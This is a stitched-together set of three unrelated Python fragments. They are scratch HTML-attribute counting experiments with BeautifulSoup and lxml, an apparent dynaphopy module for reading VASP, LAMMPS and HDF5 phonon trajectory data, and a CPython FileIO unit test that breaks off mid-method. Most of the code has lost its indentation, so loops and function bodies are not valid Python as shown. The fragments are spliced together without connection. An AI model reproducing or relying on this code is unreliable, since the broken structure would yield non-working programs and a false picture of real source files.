                self.counter[k] += 1
                if isinstance(v, list):
                    # multi-valued attributes (e.g. class) are unhashable lists,
                    # so count each value separately (mirrors the loop below)
                    for l in v:
                        self.counter[(k, l)] += 1
                        self.counter[l] += 1
                else:
                    self.counter[atts] += 1
                    self.counter[v] += 1
# scratch experiments: run the counters against the first soup of the loaded training case
soup = tr1.soups[0]
z = SoupStats(soup)
counter = Counter()
for child in soup.findChildren():
for atts in child.attrs.items():
k,v = atts
counter[k] += 1
if isinstance(v, list):
for l in v:
counter[(k, l)] += 1
counter[l] += 1
counter[(k, " ".join(v))] += 1
else:
counter[atts] += 1
counter[v] += 1
import lxml.html
from lxml.html import HtmlComment

# scratch: parse sample markup, list elements, and filter out comment nodes
html = '<div><!-- a comment --><p>text</p></div>'
tree = lxml.html.fromstring(html)
elements = tree.findall('.//*')
no_comments = [element for element in tree if not isinstance(element, HtmlComment)]
print(lxml.html.tostring(tree))
tr = Training('betterdoctor-doctor-referalls', '/Users/pascal/GDrive/sky_package/sky/tests/').load()
|
|
import mmap
import os
import numpy as np
import dynaphopy.dynamics as dyn
import dynaphopy.atoms as atomtest
from dynaphopy.interface import phonopy_link as pho_interface
def diff_matrix(array_1, array_2, cell_size):
"""
:param array_1: supercell scaled positions respect unit cell
:param array_2: supercell scaled positions respect unit cell
:param cell_size: diference between arrays accounting for periodicity
:return:
"""
array_1_norm = np.array(array_1) / np.array(cell_size, dtype=float)[None,:]
array_2_norm = np.array(array_2) / np.array(cell_size, dtype=float)[None,:]
return array_2_norm - array_1_norm
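# Quick numeric check of diff_matrix(): both arrays are divided by the
# supercell dimensions first, so a displacement of one full cell along an
# axis shows up as 1/cell_size in that column.
def _example_diff_matrix():
    a = np.array([[0.0, 0.0, 0.0]])
    b = np.array([[1.0, 2.0, 0.0]])
    return diff_matrix(a, b, [2, 2, 2])   # [[0.5, 1.0, 0.0]]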
def check_atoms_order(filename, trajectory_reading_function, structure):
trajectory = trajectory_reading_function(filename,
structure=structure,
initial_cut=0,
end_cut=1
)
    # For now average_positions() depends on the order of atoms, so it cannot be used here yet;
    # in the future, however, this should work:
# reference = trajectory.average_positions()
# Only using first step
reference = trajectory.trajectory[0]
template = get_correct_arrangement(reference, structure)
return template
def get_correct_arrangement(reference, structure):
# print structure.get_scaled_positions()
scaled_coordinates = []
for coordinate in reference:
trans = np.dot(coordinate, np.linalg.inv(structure.get_cell()))
#print coordinate.real, trans.real
scaled_coordinates.append(np.array(trans.real, dtype=float))
number_of_cell_atoms = structure.get_number_of_atoms()
number_of_supercell_atoms = len(scaled_coordinates)
supercell_dim = np.array(np.round(np.max(scaled_coordinates, axis=0)), dtype=int)
unit_cell_scaled_coordinates = scaled_coordinates - np.array(scaled_coordinates, dtype=int)
atom_unit_cell_index = []
for coordinate in unit_cell_scaled_coordinates:
# Only works for non symmetric cell (must be changed)
diff = np.abs(np.array([coordinate]*number_of_cell_atoms) - structure.get_scaled_positions())
diff[diff >= 0.5] -= 1.0
diff[diff < -0.5] += 1.0
# print 'diff', diff
# print 'postions', structure.get_scaled_positions()
index = np.argmin(np.linalg.norm(diff, axis=1))
# print 'test', coordinate, index
atom_unit_cell_index.append(index)
atom_unit_cell_index = np.array(atom_unit_cell_index)
# np.savetxt('index.txt', np.sort(atom_unit_cell_index))
# np.savetxt('test.txt', unit_coordinates)
# np.savetxt('test2.txt', np.array([type_0(j, cell_size, number_of_cell_atoms)[:3] for j in range(number_of_supercell_atoms)]))
# print supercell_dim, number_of_supercell_atoms
original_conf = np.array([dynaphopy_order(j, supercell_dim)[:3] for j in range(number_of_supercell_atoms)])
# np.savetxt('original.txt', original_conf)
# np.savetxt('unitcoor.txt', scaled_coordinates)
# print np.array(scaled_coordinates).shape
# print original_conf.shape
template = []
lp_coordinates = []
for i, coordinate in enumerate(scaled_coordinates):
lattice_points_coordinates = coordinate - structure.get_scaled_positions()[atom_unit_cell_index[i]]
# print 'c', i, coordinate, coordinate2
for k in range(3):
if lattice_points_coordinates[k] > supercell_dim[k] - 0.5:
lattice_points_coordinates[k] = lattice_points_coordinates[k] - supercell_dim[k]
if lattice_points_coordinates[k] < -0.5:
lattice_points_coordinates[k] = lattice_points_coordinates[k] + supercell_dim[k]
comparison_cell = np.array([lattice_points_coordinates]*number_of_supercell_atoms)
        difference = np.linalg.norm(diff_matrix(original_conf, comparison_cell, supercell_dim), axis=1)
        template.append(np.argmin(difference) + atom_unit_cell_index[i] * number_of_supercell_atoms // number_of_cell_atoms)
lp_coordinates.append(lattice_points_coordinates)
template = np.array(template)
# lp_coordinates = np.array(lp_coordinates)
# print original_conf.shape, lp_coordinates.shape, template.shape
# np.savetxt('index2.txt', np.sort(template))
# np.savetxt('index_tot.txt', np.sort(template*number_of_cell_atoms + atom_unit_cell_index))
# inv_template = inverse_template(template)
# inv_template = np.argsort(template)
# dm = diff_matrix(original_conf, lp_coordinates[inv_template], supercell_dim)
# dm = diff_matrix(original_conf[template], lp_coordinates, supercell_dim)
# np.savetxt('template.txt', template)
# np.savetxt('lp.txt', lp_coordinates[inv_template])
# np.savetxt('diff.txt', dm)
if len(np.unique(template)) < len(template):
print ('template failed, auto-order will not be applied')
print ('unique: {} / {}'.format(len(np.unique(template)), len(template)))
return range(len(template))
return template
def dynaphopy_order(i, size):
x = np.mod(i, size[0])
y = np.mod(i, size[0]*size[1])//size[0]
z = np.mod(i, size[0]*size[1]*size[2])//(size[1]*size[0])
k = i//(size[1]*size[0]*size[2])
return np.array([x, y, z, k])
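# dynaphopy_order() unpacks a flat supercell atom index into (x, y, z, k):
# x, y, z locate the unit cell inside the supercell and k is the remaining
# block index. Example for a 2x2x2 supercell:
def _example_dynaphopy_order():
    size = (2, 2, 2)
    return [tuple(dynaphopy_order(i, size)) for i in range(4)]
    # -> [(0, 0, 0, 0), (1, 0, 0, 0), (0, 1, 0, 0), (1, 1, 0, 0)]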
def get_trajectory_parser(file_name, bytes_to_check=1000000):
from dynaphopy.interface.iofile import trajectory_parsers as tp
parsers_keywords = {'vasp_outcar': {'function': tp.read_vasp_trajectory,
'keywords': ['NIONS', 'POMASS', 'direct lattice vectors']},
'lammps_dump': {'function': tp.read_lammps_trajectory,
'keywords': ['ITEM: TIMESTEP', 'ITEM: NUMBER OF ATOMS', 'ITEM: BOX BOUNDS']},
'vasp_xdatcar': {'function': tp.read_VASP_XDATCAR,
'keywords': ['Direct configuration', 'Direct configuration', '=']}}
# Check file exists
if not os.path.isfile(file_name):
print (file_name + ' file does not exist')
exit()
file_size = os.stat(file_name).st_size
# Check available parsers
for parser in parsers_keywords.values():
with open(file_name, "r+b") as f:
file_map = mmap.mmap(f.fileno(), np.min([bytes_to_check, file_size]))
num_test = [file_map.find(keyword.encode()) for keyword in list(parser['keywords'])]
if not -1 in num_test:
return parser['function']
return None
def read_from_file_structure_outcar(file_name):
# Check file exists
if not os.path.isfile(file_name):
print('Structure file does not exist!')
exit()
# Read from VASP OUTCAR file
print('Reading VASP structure')
with open(file_name, "r+b") as f:
# memory-map the file
file_map = mmap.mmap(f.fileno(), 0)
# Setting number of dimensions
number_of_dimensions = 3
# trash reading for guessing primitive cell (Not stable)
if False:
# Reading primitive cell (not sure about this, by default disabled)
position_number = file_map.find(b'PRICEL')
file_map.seek(position_number)
position_number = file_map.find(b'A1')
file_map.seek(position_number)
primitive_cell = [] #Primitive Cell
for i in range (number_of_dimensions):
            primitive_cell.append(file_map.readline()
                                  .replace(",", "")
                                  .replace(")", "")
                                  .replace("(", "")
                                  .split()[3:number_of_dimensions+3])
primitive_cell = np.array(primitive_cell,dtype="double")
# Reading number of atoms
position_number = file_map.find(b'NIONS =')
file_map.seek(position_number+7)
number_of_atoms = int(file_map.readline())
# Reading atoms per type
position_number = file_map.find(b'ions per type')
file_map.seek(position_number+15)
atoms_per_type = np.array(file_map.readline().split(),dtype=int)
# Reading atoms mass
position_number = file_map.find(b'POMASS =')
atomic_mass_per_type = []
for i in range(atoms_per_type.shape[0]):
file_map.seek(position_number+9+6*i)
atomic_mass_per_type.append(file_map.read(6))
atomic_mass = sum([[atomic_mass_per_type[j]
for i in range(atoms_per_type[j])]
for j in range(atoms_per_type.shape[0])],[])
atomic_mass = np.array(atomic_mass,dtype='double')
# Reading cell
position_number = file_map.find(b'direct lattice vectors')
file_map.seek(position_number)
file_map.readline()
direct_cell = [] #Direct Cell
for i in range (number_of_dimensions):
direct_cell.append(file_map.readline().split()[0:number_of_dimensions])
direct_cell = np.array(direct_cell,dtype='double')
file_map.seek(position_number)
file_map.readline()
reciprocal_cell = [] #Reciprocal cell
for i in range (number_of_dimensions):
reciprocal_cell.append(file_map.readline().split()[number_of_dimensions:number_of_dimensions*2])
reciprocal_cell = np.array(reciprocal_cell,dtype='double')
# Reading positions fractional cartesian
position_number=file_map.find(b'position of ions in fractional coordinates')
file_map.seek(position_number)
file_map.readline()
positions_fractional = []
for i in range (number_of_atoms):
positions_fractional.append(file_map.readline().split()[0:number_of_dimensions])
positions_fractional = np.array(positions_fractional,dtype='double')
# Reading positions cartesian
position_number=file_map.find(b'position of ions in cartesian coordinates')
file_map.seek(position_number)
file_map.readline()
positions = []
for i in range (number_of_atoms):
positions.append(file_map.readline().split()[0:3])
positions = np.array(positions,dtype='double')
file_map.close()
return atomtest.Structure(cell= direct_cell,
positions=positions,
masses=atomic_mass,
)
def read_from_file_structure_poscar(file_name, number_of_dimensions=3):
# Check file exists
if not os.path.isfile(file_name):
print('Structure file does not exist!')
exit()
# Read from VASP POSCAR file
print("Reading VASP POSCAR structure")
poscar_file = open(file_name, 'r')
data_lines = poscar_file.read().split('\n')
poscar_file.close()
multiply = float(data_lines[1])
direct_cell = np.array([data_lines[i].split()
for i in range(2, 2+number_of_dimensions)], dtype=float)
direct_cell *= multiply
scaled_positions = None
positions = None
try:
number_of_types = np.array(data_lines[3+number_of_dimensions].split(),dtype=int)
coordinates_type = data_lines[4+number_of_dimensions][0]
if coordinates_type == 'D' or coordinates_type == 'd' :
scaled_positions = np.array([data_lines[8+k].split()[0:3]
for k in range(np.sum(number_of_types))],dtype=float)
else:
positions = np.array([data_lines[8+k].split()[0:3]
for k in range(np.sum(number_of_types))],dtype=float)
atomic_types = []
for i,j in enumerate(data_lines[5].split()):
atomic_types.append([j]*number_of_types[i])
atomic_types = [item for sublist in atomic_types for item in sublist]
# atomic_types = np.array(atomic_types).flatten().tolist()
# Old style POSCAR format
except ValueError:
print ("Reading old style POSCAR")
number_of_types = np.array(data_lines[5].split(), dtype=int)
coordinates_type = data_lines[6][0]
if coordinates_type == 'D' or coordinates_type == 'd':
scaled_positions = np.array([data_lines[7+k].split()[0:3]
for k in range(np.sum(number_of_types))], dtype=float)
else:
positions = np.array([data_lines[7+k].split()[0:3]
for k in range(np.sum(number_of_types))], dtype=float)
atomic_types = []
for i,j in enumerate(data_lines[0].split()):
atomic_types.append([j]*number_of_types[i])
atomic_types = [item for sublist in atomic_types for item in sublist]
# atomic_types = np.array(atomic_types).flatten().tolist()
return atomtest.Structure(cell=direct_cell, # cell_matrix, lattice vectors in rows
scaled_positions=scaled_positions,
positions=positions,
atomic_elements=atomic_types,
# primitive_cell=primitive_cell
)
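# For reference, a minimal new-style POSCAR that the parser above accepts
# (illustrative values; the line indices match the data_lines[...] offsets
# used in read_from_file_structure_poscar for number_of_dimensions=3):
#
#   NaCl primitive cell      <- data_lines[0]: comment (element names here in old style)
#   1.0                      <- data_lines[1]: scale factor
#   4.0 0.0 0.0              <- data_lines[2..4]: lattice vectors
#   0.0 4.0 0.0
#   0.0 0.0 4.0
#   Na Cl                    <- data_lines[5]: element symbols
#   1 1                      <- data_lines[6]: atoms per element
#   Direct                   <- data_lines[7]: coordinate type ('D'/'d' = fractional)
#   0.0 0.0 0.0              <- data_lines[8...]: positions
#   0.5 0.5 0.5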
# Just for testing (use with care): generates a harmonic trajectory using the harmonic eigenvectors.
# All phonons are set to have the same phase, defined by phase_0. The amplitude of each phonon mode is
# adjusted so that all modes carry the same energy. This amplitude is given in temperature units,
# assuming that the phonon energy follows a Maxwell-Boltzmann distribution.
def generate_test_trajectory(structure, supercell=(1, 1, 1),
minimum_frequency=0.1, # THz
total_time=2, # picoseconds
time_step=0.002, # picoseconds
temperature=400, # Kelvin
silent=False,
memmap=False,
phase_0=0.0):
import random
from dynaphopy.power_spectrum import _progress_bar
print('Generating ideal harmonic data for testing')
kb_boltzmann = 0.831446 # u * A^2 / ( ps^2 * K )
number_of_unit_cells_phonopy = np.prod(np.diag(structure.get_supercell_phonon()))
number_of_unit_cells = np.prod(supercell)
# atoms_relation = float(number_of_unit_cells)/ number_of_unit_cells_phonopy
# Recover dump trajectory from file (test only)
import pickle
if False:
dump_file = open( "trajectory.save", "r" )
trajectory = pickle.load(dump_file)
return trajectory
number_of_atoms = structure.get_number_of_cell_atoms()
number_of_primitive_atoms = structure.get_number_of_primitive_atoms()
number_of_dimensions = structure.get_number_of_dimensions()
positions = structure.get_positions(supercell=supercell)
masses = structure.get_masses(supercell=supercell)
number_of_atoms = number_of_atoms*number_of_unit_cells
number_of_primitive_cells = number_of_atoms // number_of_primitive_atoms
atom_type = structure.get_atom_type_index(supercell=supercell)
# Generate additional wave vectors sample
# structure.set_supercell_phonon_renormalized(np.diag(supercell))
q_vector_list = pho_interface.get_commensurate_points(structure, np.diag(supercell))
q_vector_list_cart = [ np.dot(q_vector, 2*np.pi*np.linalg.inv(structure.get_primitive_cell()).T)
for q_vector in q_vector_list]
atoms_relation = float(len(q_vector_list)*number_of_primitive_atoms)/number_of_atoms
# Generate frequencies and eigenvectors for the testing wave vector samples
print('Wave vectors included in test (commensurate points)')
eigenvectors_r = []
frequencies_r = []
for i in range(len(q_vector_list)):
print(q_vector_list[i])
eigenvectors, frequencies = pho_interface.obtain_eigenvectors_and_frequencies(structure, q_vector_list[i])
eigenvectors_r.append(eigenvectors)
frequencies_r.append(frequencies)
number_of_frequencies = len(frequencies_r[0])
# Generating trajectory
if not silent:
_progress_bar(0, 'generating')
trajectory = []
for time in np.arange(total_time, step=time_step):
coordinates = np.array(positions[:, :], dtype=complex)
for i_freq in range(number_of_frequencies):
for i_long, q_vector in enumerate(q_vector_list_cart):
if abs(frequencies_r[i_long][i_freq]) > minimum_frequency: # Prevent error due to small frequencies
amplitude = np.sqrt(number_of_dimensions * kb_boltzmann * temperature / number_of_primitive_cells * atoms_relation)/(frequencies_r[i_long][i_freq] * 2 * np.pi) # + random.uniform(-1,1)*0.05
normal_mode = amplitude * np.exp(-1j * frequencies_r[i_long][i_freq] * 2.0 * np.pi * time)
phase = np.exp(1j * np.dot(q_vector, positions.T) + phase_0)
coordinates += (1.0 / np.sqrt(masses)[None].T *
eigenvectors_r[i_long][i_freq, atom_type] *
phase[None].T *
normal_mode).real
trajectory.append(coordinates)
if not silent:
_progress_bar(float(time + time_step) / total_time, 'generating', )
trajectory = np.array(trajectory)
time = np.array([i * time_step for i in range(trajectory.shape[0])], dtype=float)
energy = np.array([number_of_atoms * number_of_dimensions *
kb_boltzmann * temperature
for i in range(trajectory.shape[0])], dtype=float)
# Save a trajectory object to file for later recovery (test only)
if False:
dump_file = open("trajectory.save", "w")
pickle.dump(dyn.Dynamics(structure=structure,
trajectory=np.array(trajectory, dtype=complex),
energy=np.array(energy),
time=time,
supercell=np.dot(np.diagflat(supercell), structure.get_cell())),
dump_file)
dump_file.close()
# structure.set_supercell_phonon_renormalized(None)
return dyn.Dynamics(structure=structure,
trajectory=np.array(trajectory,dtype=complex),
energy=np.array(energy),
time=time,
supercell=np.dot(np.diagflat(supercell), structure.get_cell()),
memmap=memmap)
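# For reference, the amplitude used in the loop above is the classical
# harmonic-oscillator result: a mode with frequency f (in THz, so angular
# frequency w = 2*pi*f in rad/ps) carrying an energy of order kb*T per degree
# of freedom gets a displacement amplitude proportional to sqrt(kb*T)/w; the
# mass enters separately through the 1/sqrt(masses) factor applied with the
# eigenvector. A stripped-down numeric sketch mirroring that expression
# (illustrative helper only, not called by the code above):
def _example_mode_amplitude(temperature=400.0, frequency=5.0,
                            number_of_dimensions=3,
                            number_of_primitive_cells=1, atoms_relation=1.0):
    kb_boltzmann = 0.831446  # u * A^2 / (ps^2 * K), same constant as above
    return (np.sqrt(number_of_dimensions * kb_boltzmann * temperature /
                    number_of_primitive_cells * atoms_relation) /
            (frequency * 2 * np.pi))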
# Testing function
def read_from_file_test():
print('Reading structure from test file')
# Test conditions
number_of_dimensions = 2
f_coordinates = open('Data Files/test.out', 'r')
f_velocity = open('Data Files/test2.out', 'r')
f_trajectory = open('Data Files/test3.out', 'r')
# Coordinates reading
positions = []
while True:
row = f_coordinates.readline().split()
if not row: break
for i in range(len(row)): row[i] = float(row[i])
positions.append(row)
atom_type = np.array(positions,dtype=int)[:, 2]
positions = np.array(positions)[:,:number_of_dimensions]
print('Coordinates reading complete')
structure = atomtest.Structure(positions=positions,
atomic_numbers=atom_type,
cell=[[2,0],[0,1]],
masses=[1] * positions.shape[0]) #all 1
number_of_atoms = structure.get_number_of_atoms()
structure.set_number_of_primitive_atoms(2)
print('number of atoms in primitive cell')
print(structure.get_number_of_primitive_atoms())
print('number of total atoms in structure (super cell)')
print(number_of_atoms)
# Velocity reading section
velocity = []
while True:
row = f_velocity.readline().replace('I','j').replace('*','').replace('^','E').split()
if not row: break
for i in range(len(row)): row[i] = complex('('+row[i]+')')
velocity.append(row)
# velocity = velocity[:4000][:]  # Limit the number of points (testing only)
time = np.array([velocity[i][0] for i in range(len(velocity))]).real
velocity = np.array([[[velocity[i][j*number_of_dimensions+k+1]
for k in range(number_of_dimensions)]
for j in range(number_of_atoms)]
for i in range (len(velocity))])
print('Velocity reading complete')
# Trajectory reading
trajectory = []
while True:
row = f_trajectory.readline().replace('I','j').replace('*','').replace('^','E').split()
if not row: break
for i in range(len(row)): row[i] = complex('('+row[i]+')')
trajectory.append(row)
trajectory = np.array([[[trajectory[i][j*number_of_dimensions+k+1]
for k in range(number_of_dimensions)]
for j in range(number_of_atoms)]
for i in range (len(trajectory))])
print('Trajectory reading complete')
return dyn.Dynamics(trajectory=trajectory,
#velocity=velocity,
time=time,
structure=structure)
def write_curve_to_file(frequency_range, curve_matrix, file_name):
output_file = open(file_name, 'w')
for i in range(curve_matrix.shape[0]):
output_file.write("{0:10.4f}\t".format(frequency_range[i]))
for j in curve_matrix[i, :]:
output_file.write("{0:.10e}\t".format(j))
output_file.write("\n")
output_file.close()
return 0
def read_parameters_from_input_file(file_name, number_of_dimensions=3):
input_parameters = {'structure_file_name_poscar': 'POSCAR'}
# Check file exists
if not os.path.isfile(file_name):
print (file_name + ' file does not exist')
exit()
with open(file_name, "r") as f:
input_file = f.readlines()
for i, line in enumerate(input_file):
if line[0] == '#':
continue
if "STRUCTURE FILE OUTCAR" in line:
input_parameters.update({'structure_file_name_outcar': input_file[i+1].replace('\n','').strip()})
if "STRUCTURE FILE POSCAR" in line:
input_parameters.update({'structure_file_name_poscar': input_file[i+1].replace('\n','').strip()})
if "FORCE SETS" in line:
input_parameters.update({'force_sets_file_name': input_file[i+1].replace('\n','').strip()})
if "FORCE CONSTANTS" in line:
input_parameters.update({'force_constants_file_name': input_file[i+1].replace('\n','').strip()})
# print('Warning!: FORCE CONSTANTS label in input has changed. Please use FORCE SETS instead')
# exit()
if "PRIMITIVE MATRIX" in line:
primitive_matrix = [input_file[i+j+1].replace('\n','').split() for j in range(number_of_dimensions)]
input_parameters.update({'_primitive_matrix': np.array(primitive_matrix, dtype=float)})
if "SUPERCELL MATRIX" in line:
super_cell_matrix = [input_file[i+j+1].replace('\n','').split() for j in range(number_of_dimensions)]
super_cell_matrix = np.array(super_cell_matrix, dtype=int)
input_parameters.update({'supercell_phonon': np.array(super_cell_matrix, dtype=int)})
if "BANDS" in line:
bands = []
labels = []
while i < len(input_file)-1:
line = input_file[i + 1].replace('\n', '')
try:
labels.append(line.split(':')[1].replace('\n','').split(','))
line = line.split(':')[0]
except IndexError:
pass
try:
band = np.array(line.replace(',',' ').split(), dtype=float).reshape((2,3))
except IOError:
break
except ValueError:
break
i += 1
bands.append(band)
labels = [(label[0].replace(' ',''), label[1].replace(' ','')) for label in labels]
if labels != []:
input_parameters.update({'_band_ranges': {'ranges': bands,
'labels': labels}})
else:
input_parameters.update({'_band_ranges': {'ranges':bands}})
if "MESH PHONOPY" in line:
input_parameters.update({'_mesh_phonopy': np.array(input_file[i+1].replace('\n','').split(),dtype=int)})
return input_parameters
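# Example input file for the parser above (illustrative; each keyword line is
# matched verbatim, values are read from the following line(s), and lines
# starting with '#' are skipped):
#
#   STRUCTURE FILE POSCAR
#   POSCAR
#   FORCE CONSTANTS
#   FORCE_CONSTANTS
#   PRIMITIVE MATRIX
#   1.0 0.0 0.0
#   0.0 1.0 0.0
#   0.0 0.0 1.0
#   SUPERCELL MATRIX
#   2 0 0
#   0 2 0
#   0 0 2
#   BANDS
#   0.0 0.0 0.0  0.5 0.0 0.5 : GAMMA, X
#   MESH PHONOPY
#   20 20 20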
def write_xsf_file(file_name,structure):
xsf_file = open(file_name,"w")
xsf_file.write("CRYSTAL\n")
xsf_file.write("PRIMVEC\n")
for row in structure.get_primitive_cell():
xsf_file.write("{0:10.4f}\t{1:10.4f}\t{2:10.4f}\n".format(*row))
xsf_file.write("CONVVEC\n")
for row in structure.get_cell():
xsf_file.write("{0:10.4f}\t{1:10.4f}\t{2:10.4f}\n".format(*row))
xsf_file.write("PRIMCOORD\n")
xsf_file.write("{0:10d} {1:10d}\n".format(structure.get_number_of_primitive_atoms(),1))
counter = 0
while counter < structure.get_number_of_atom_types():
for i,value_type in enumerate(structure.get_atom_type_index()):
if value_type == counter:
xsf_file.write("{0:4d}\t{1:10.4f}\t{2:10.4f}\t{3:10.4f}\n".format(structure.get_atomic_numbers()[i],
*structure.get_positions()[i]))
counter += 1
break
xsf_file.close()
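# Shape of the XSF file written above (illustrative fragment for a two-atom,
# two-type primitive cell; atomic numbers and coordinates are placeholders):
#
#   CRYSTAL
#   PRIMVEC
#       4.0000      0.0000      0.0000
#       0.0000      4.0000      0.0000
#       0.0000      0.0000      4.0000
#   CONVVEC
#       4.0000      0.0000      0.0000
#       0.0000      4.0000      0.0000
#       0.0000      0.0000      4.0000
#   PRIMCOORD
#            2          1
#     11      0.0000      0.0000      0.0000
#     17      2.0000      2.0000      2.0000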
# Save & load HDF5 data file
def save_data_hdf5(file_name, time, super_cell, trajectory=None, velocity=None, vc=None, reduced_q_vector=None):
import h5py
hdf5_file = h5py.File(file_name, "w")
if trajectory is not None:
hdf5_file.create_dataset('trajectory', data=trajectory)
if velocity is not None:
hdf5_file.create_dataset('velocity', data=velocity)
if vc is not None:
hdf5_file.create_dataset('vc', data=vc)
if reduced_q_vector is not None:
hdf5_file.create_dataset('reduced_q_vector', data=reduced_q_vector)
hdf5_file.create_dataset('time', data=time)
hdf5_file.create_dataset('super_cell', data=super_cell)
# print("saved", velocity.shape[0], "steps")
hdf5_file.close()
def initialize_from_hdf5_file(file_name, structure, read_trajectory=True, initial_cut=1, final_cut=None, memmap=False):
import h5py
print("Reading data from hdf5 file: " + file_name)
trajectory = None
velocity = None
vc = None
reduced_q_vector = None
# Check file exists
if not os.path.isfile(file_name):
print(file_name + ' file does not exist!')
exit()
hdf5_file = h5py.File(file_name, "r")
if "trajectory" in hdf5_file and read_trajectory is True:
trajectory = hdf5_file['trajectory'][:]
if final_cut is not None:
trajectory = trajectory[initial_cut-1:final_cut]
else:
trajectory = trajectory[initial_cut-1:]
if "velocity" in hdf5_file:
velocity = hdf5_file['velocity'][:]
if final_cut is not None:
velocity = velocity[initial_cut-1:final_cut]
else:
velocity = velocity[initial_cut-1:]
if "vc" in hdf5_file:
vc = hdf5_file['vc'][:]
if final_cut is not None:
vc = vc[initial_cut-1:final_cut]
else:
vc = vc[initial_cut-1:]
if "reduced_q_vector" in hdf5_file:
reduced_q_vector = hdf5_file['reduced_q_vector'][:]
print("Load trajectory projected onto {0}".format(reduced_q_vector))
time = hdf5_file['time'][:]
supercell = hdf5_file['super_cell'][:]
hdf5_file.close()
if vc is None:
return dyn.Dynamics(structure=structure,
trajectory=trajectory,
velocity=velocity,
time=time,
supercell=np.dot(np.diagflat(supercell), structure.get_cell()),
memmap=memmap)
else:
return vc, reduced_q_vector, dyn.Dynamics(structure=structure,
time=time,
supercell=np.dot(np.diagflat(supercell), structure.get_cell()),
memmap=memmap)
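# Round-trip sketch for the two helpers above (illustrative; the file name
# and arrays are placeholders, and h5py must be installed):
#
#   save_data_hdf5('dump.hdf5', time, super_cell,
#                  trajectory=trajectory, velocity=velocity)
#   dynamics = initialize_from_hdf5_file('dump.hdf5', structure,
#                                        initial_cut=1, final_cut=None)
#
# Note that when a 'vc' dataset is present, initialize_from_hdf5_file returns
# a (vc, reduced_q_vector, Dynamics) tuple instead of a bare Dynamics object.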
def save_quasiparticle_data_to_file(quasiparticle_data, filename):
import yaml
def float_representer(dumper, value):
text = '{0:.8f}'.format(value)
return dumper.represent_scalar(u'tag:yaml.org,2002:float', text)
yaml.add_representer(float, float_representer)
output_dict = []
for i, q_point in enumerate(quasiparticle_data['q_points']):
q_point_dict = {'reduced_wave_vector': q_point.tolist()}
q_point_dict.update({'frequencies': quasiparticle_data['frequencies'][i].tolist()})
q_point_dict.update({'linewidths': quasiparticle_data['linewidths'][i].tolist()})
q_point_dict.update({'frequency_shifts': quasiparticle_data['frequency_shifts'][i].tolist()})
# output_dict.update({'q_point_{}'.format(i): q_point_dict})
output_dict.append(q_point_dict)
with open(filename, 'w') as outfile:
yaml.dump(output_dict, outfile, default_flow_style=False)
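# The YAML written above holds one mapping per q-point, e.g. (illustrative
# values; key order may differ depending on the yaml library version):
#
#   - reduced_wave_vector: [0.00000000, 0.00000000, 0.00000000]
#     frequencies: [4.50000000, ...]
#     linewidths: [0.12000000, ...]
#     frequency_shifts: [-0.03000000, ...]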
def save_mesh_data_to_yaml_file(mesh_data, filename):
import yaml
def float_representer(dumper, value):
text = '{0:.8f}'.format(value)
return dumper.represent_scalar(u'tag:yaml.org,2002:float', text)
yaml.add_representer(float, float_representer)
qpoints, multiplicity, frequencies, linewidths = mesh_data
output_dict = []
for i, qp in enumerate(qpoints):
mesh_dict = {}
mesh_dict['reduced_wave_vector'] = qp.tolist()
mesh_dict['frequencies'] = frequencies[i].tolist()
mesh_dict['linewidths'] = linewidths[i].tolist()
mesh_dict['multiplicity'] = int(multiplicity[i])
output_dict.append(mesh_dict)
with open(filename, 'w') as outfile:
yaml.dump(output_dict, outfile, default_flow_style=False)
def save_bands_data_to_file(bands_data, filename):
import yaml
def float_representer(dumper, value):
text = '{0:.8f}'.format(value)
return dumper.represent_scalar(u'tag:yaml.org,2002:float', text)
yaml.add_representer(float, float_representer)
with open(filename, 'w') as outfile:
yaml.dump(bands_data, outfile, default_flow_style=False)
|
|
# Adapted from test_file.py by Daniel Stutzbach
from __future__ import unicode_literals
import sys
import os
import errno
import unittest
from array import array
from weakref import proxy
from functools import wraps
from test.test_support import TESTFN, check_warnings, run_unittest, make_bad_fd
from test.test_support import py3k_bytes as bytes
from test.test_support import gc_collect
from test.script_helper import run_python
from _io import FileIO as _FileIO
class AutoFileTests(unittest.TestCase):
# file tests for which a test file is automatically set up
def setUp(self):
self.f = _FileIO(TESTFN, 'w')
def tearDown(self):
if self.f:
self.f.close()
os.remove(TESTFN)
def testWeakRefs(self):
# verify weak references
p = proxy(self.f)
p.write(bytes(range(10)))
self.assertEqual(self.f.tell(), p.tell())
self.f.close()
self.f = None
gc_collect()
self.assertRaises(ReferenceError, getattr, p, 'tell')
def testSeekTell(self):
self.f.write(bytes(range(20)))
self.assertEqual(self.f.tell(), 20)
self.f.seek(0)
self.assertEqual(self.f.tell(), 0)
self.f.seek(10)
self.assertEqual(self.f.tell(), 10)
self.f.seek(5, 1)
self.assertEqual(self.f.tell(), 15)
self.f.seek(-5, 1)
self.assertEqual(self.f.tell(), 10)
self.f.seek(-5, 2)
self.assertEqual(self.f.tell(), 15)
def testAttributes(self):
# verify expected attributes exist
f = self.f
self.assertEqual(f.mode, "wb")
self.assertEqual(f.closed, False)
# verify the attributes are readonly
for attr in 'mode', 'closed':
self.assertRaises((AttributeError, TypeError),
setattr, f, attr, 'oops')
def testReadinto(self):
# verify readinto
self.f.write(b"\x01\x02")
self.f.close()
a = array(b'b', b'x'*10)
self.f = _FileIO(TESTFN, 'r')
n = self.f.readinto(a)
self.assertEqual(array(b'b', [1, 2]), a[:n])
def test_none_args(self):
self.f.write(b"hi\nbye\nabc")
self.f.close()
self.f = _FileIO(TESTFN, 'r')
self.assertEqual(self.f.read(None), b"hi\nbye\nabc")
self.f.seek(0)
self.assertEqual(self.f.readline(None), b"hi\n")
self.assertEqual(self.f.readlines(None), [b"bye\n", b"abc"])
def testRepr(self):
self.assertEqual(repr(self.f), "<_io.FileIO name=%r mode='%s'>"
% (self.f.name, self.f.mode))
del self.f.name
self.assertEqual(repr(self.f), "<_io.FileIO fd=%r mode='%s'>"
% (self.f.fileno(), self.f.mode))
self.f.close()
self.assertEqual(repr(self.f), "<_io.FileIO [closed]>")
def testErrors(self):
f = self.f
self.assertTrue(not f.isatty())
self.assertTrue(not f.closed)
#self.assertEqual(f.name, TESTFN)
self.assertRaises(ValueError, f.read, 10) # Open for reading
f.close()
self.assertTrue(f.closed)
f = _FileIO(TESTFN, 'r')
self.assertRaises(TypeError, f.readinto, "")
self.assertTrue(not f.closed)
f.close()
self.assertTrue(f.closed)
def testMethods(self):
methods = ['fileno', 'isatty', 'read',
'tell', 'truncate', 'seekable',
'readable', 'writable']
if sys.platform.startswith('atheos'):
methods.remove('truncate')
self.f.close()
self.assertTrue(self.f.closed)
for methodname in methods:
method = getattr(self.f, methodname)
# should raise on closed file
